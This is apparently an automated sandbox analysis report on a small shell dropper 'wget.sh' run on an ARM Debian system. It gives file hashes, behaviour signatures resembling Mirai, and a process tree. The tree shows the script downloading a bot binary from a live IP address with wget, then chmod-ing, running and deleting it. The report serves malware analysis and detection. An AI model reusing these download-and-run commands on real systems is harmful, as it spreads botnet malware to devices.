Analysis

  • max time kernel
    149s
  • max time network
    112s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags
    arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    18/10/2024, 09:41

General

  • Target

    wget.sh

  • Size

    420B

  • MD5

    878878ef9a55d128c2917bfb365e4261

  • SHA1

    3f95d013d7602c813cafd4be15c43c37a9c71d2e

  • SHA256

    bd6ee818b79172a3d43e87463157ee94c942a321fd2ed582610962e323d0817a

  • SHA512

    dfb89655ef3662bb93b765211863cdff5101a00edf9f45b741e8c401402ec429196cf97b4c4e54dfbfc7153b3c50c2ae9da5e3fab45d51a96f0f25ca6c365cf6

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Renames itself 2 IoCs
  • Reads process memory 1 TTPs 1 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Changes its process name 1 IoCs
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/wget.sh
    /tmp/wget.sh
    1⤵
    • Writes file to tmp directory
    PID:647
    • /bin/rm
      rm -rf dvrLocker
      2⤵
      PID:648
    • /usr/bin/wget
      wget http://103.149.87.69/a/b/la.bot.arm -O -
      2⤵
      PID:650
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:677
    • /mnt/dvrLocker
      ./dvrLocker
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Renames itself
      • Reads process memory
      • Changes its process name
      PID:678
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:682
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:694
    • /bin/rm
      rm -rf dvrLocker
      2⤵
      PID:708

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /mnt/dvrLocker

    Filesize

    54KB

    MD5

    be76a190f3b90d5cb00a5cbc15b112a4

    SHA1

    da8903c31f36952390ff4975683504b9ceff05ea

    SHA256

    9258876ed0aaf0ff28b2b68c5e1ebac8680d7dc8b5de2f67e198035b1f1d545e

    SHA512

    0ef32ef56b4cd888974fc1e900be3956ef23e447b4efb3c1231b11dd77596455b9a5f2927c11f2380308deeb5e97b1a8afd76c350d2d70daea9c1b862934b771